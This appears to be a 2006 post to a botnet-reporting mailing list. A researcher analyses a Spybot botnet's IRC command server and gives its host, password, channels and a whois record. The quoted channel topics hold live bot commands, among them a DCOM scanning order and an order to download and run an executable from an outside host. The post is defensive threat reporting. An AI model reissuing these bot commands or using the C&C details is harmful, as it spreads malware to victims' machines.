To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
Jeremy Linden wrote:
..
 >
 > I just had a conversation with the guy who runs this botnet.  He's from
 > Lebanon, part of the GurLteam (a common name if you do lots of botnet
 > stuff), and he installs spyware on his machines, as a business.  In my
 > opinion, this won't be used for DDoS; these guys are professional
 > criminals who just want to make their money.  I hope they get busted
 > though.
 >
 > Jeremy Linden

Here's another one by the GurLteam:

Botnet (W32/Spybot.AKCH):

[ Network services ]
     * Looks for an Internet connection.
     * Connects to "users.hot-screen.com" on port 6667 (TCP).
     * Connects to IRC server.
     * IRC: Uses password nadjoe.
     * IRC: Uses nickname Tfeh-80340024.
     * IRC: Uses username ezkieyacag.
     * IRC: Joins channel ##Tfeh with password li.
     * IRC: Sets the usermode for user Tfeh-80340024 to -x+B.


inetnum:         83.98.133.0 - 83.98.133.255
netname:         NL-NFORCE-ENTERTAINMENT
descr:           NForce Entertainment
country:         NL
admin-c:         RVE16-RIPE
tech-c:          RVE16-RIPE
status:          ASSIGNED PA "status:" definitions
mnt-by:          ROKSCOM-MNT
source:          RIPE # Filtered

* Looking up users.hot-screen.com
* Connecting to users.hot-screen.com (83.98.133.125) port 6667...
* Connected. Now logging in...
* GurLStuff, [EMAIL PROTECTED]
* MAP KNOCK SAFELIST HCN MAXCHANNELS=8 MAXBANS=60 NICKLEN=30 TOPICLEN=307 
KICKLEN=307 MAXTARGETS=15 AWAYLEN=307 :are supported by this server
* WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ 
CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=GurLStuff CASEMAPPING=ascii 
EXTBAN=~,cqr :are supported by this server

  Now talking on ##Tfeh
* Topic for ##Tfeh is: ;raw join ##lscan,##lmon
* Topic for ##Tfeh set by GurL at Sun Mar 26 20:22:26 2006

--> Now talking on ##lscan
* Topic for ##lscan is: ;advscan dcom135 300 5 0 -r -s
* Topic for ##lscan set by GurL at Sun Mar 26 20:22:26 2006

--> Now talking on ##lmon
* Topic for ##lmon is: ;download http://www.darkblueroom.com/smart.exe 
c:\smart.exe 1 -s
* Topic for ##lmon set by GurL at Sun Mar 26 20:22:25 2006

smart.exe extracts the following files to to c:\Windows\tok (scanned with 
AntiVir)

mc-110-12-0000336.exe (DR/Dldr.NSIS.Agent.P.1)
smart.exe (?)
yaz.exe (TR/LowZones.CR.2)
zan.exe (TR/LowZones.CR.3)
run.bat

I don't know yet what the unpacked smart.exe does.

nick..

_______________________________________________
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement 
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets

Reply via email to